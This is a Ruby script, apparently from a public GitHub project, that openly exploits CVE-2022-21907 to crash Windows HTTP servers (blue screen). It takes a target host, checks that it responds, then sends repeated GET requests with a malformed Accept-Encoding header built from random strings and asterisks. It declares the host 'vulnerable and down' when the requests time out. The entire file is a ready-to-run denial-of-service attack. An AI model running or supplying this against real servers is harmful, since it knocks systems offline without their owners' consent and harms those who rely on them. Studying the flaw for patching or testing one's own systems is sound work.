CVE-2022-21907.rb

#!/usr/bin/env ruby
# frozen_string_literal: true

##
# This script exploit the CVE-2022-21907 for a DOS (Denial of Service)
# attack (Blue Screen).

###################
#    This script exploit the CVE-2022-21907 for a DOS attack.
#    Copyright (C) 2022  Maurice Lambert

#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation, either version 3 of the License, or
#    (at your option) any later version.

#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.

#    You should have received a copy of the GNU General Public License
#    along with this program.  If not, see <https://www.gnu.org/licenses/>.
###################

##
# Project version
VERSION = '1.0.0'

##
# Project author
AUTHOR = 'Maurice Lambert'

##
# E-mail of the author of the project
AUTHOR_EMAIL = 'mauricelambert434@gmail.com'

##
# Project maintainer
MAINTAINER = 'Maurice Lambert'

##
# E-mail of the maintainer of the project
MAINTAINER_EMAIL = 'mauricelambert434@gmail.com'

##
# Project description
DESCRIPTION = '
This script exploit the CVE-2022-21907 for a DOS (Denial of Service)
attack (Blue Screen).
'

##
# Project license
LICENSE = 'GPL-3.0 License'

##
# Project url
URL = 'https://github.com/mauricelambert/CVE-2022-21907'

##
# Project copyright
COPYRIGHT = '
CVE-2022-21907  Copyright (C) 2022  Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
'

puts "#{COPYRIGHT}\n"

require 'net/http'

##
# This class implements methods to exploit
# the CVE-2022-21907 for a DOS (Denial of Service)
# attack (Blue Screen) with ruby.
class CVE202221907
  ##
  # This function gets target host from the STDIN

  def self.get_stdin_host
    print 'Host (target): '
    gets.strip
  end

  ##
  # This function generates a random string

  def self.generate_random_string(size)
    upper_characters = Array('A'..'Z')
    Array.new(size) { upper_characters.sample }.join
  end

  ##
  # This function generates a random payload

  def self.generate_encoding_payload
    "#{generate_random_string(24)},#{generate_random_string(60)}&" \
      "#{generate_random_string(2)}&**" \
      "#{generate_random_string(20)}**#{Array('A'..'Z').sample}," \
      "#{generate_random_string(73)},#{generate_random_string(71)}" \
      ",#{generate_random_string(27)},****************************" \
      "#{generate_random_string(6)}, *, ,"
  end

  ##
  # This function checks the target state

  def self.check_up(request, uri)
    res = Net::HTTP.start(
      uri.hostname, uri.port,
      read_timeout: 60,
      open_timeout: 60,
      use_ssl: uri.scheme == 'https'
    ) { |http| http.request(request) }
  rescue Net::OpenTimeout, Errno::ETIMEDOUT, SocketError
    puts '[!] This host is probably inaccessible'
    2
  else
    nil
  end

  ##
  # The main function to launch the attack

  def self.main
    host = ARGV[0] || get_stdin_host

    uri = URI("http://#{host}")
    request = Net::HTTP::Get.new(uri)

    access_error = check_up(request, uri)
    return access_error if access_error

    request['Accept-Encoding'] = generate_encoding_payload
    vulnerable = false

    10.times do
      Net::HTTP.start(
        uri.hostname, uri.port,
        read_timeout: 10,
        open_timeout: 10,
        use_ssl: uri.scheme == 'https'
      ) { |http| http.request(request) }
    rescue Net::OpenTimeout, Errno::ETIMEDOUT
      vulnerable = true
      break
    end

    if vulnerable
      puts "[+] Target: #{host} is vulnerable and down."
      0
    else
      puts "[-] Target: #{host} is not vulnerable and up."
      1
    end
  end
end

exit(CVE202221907.main) if __FILE__ == $PROGRAM_NAME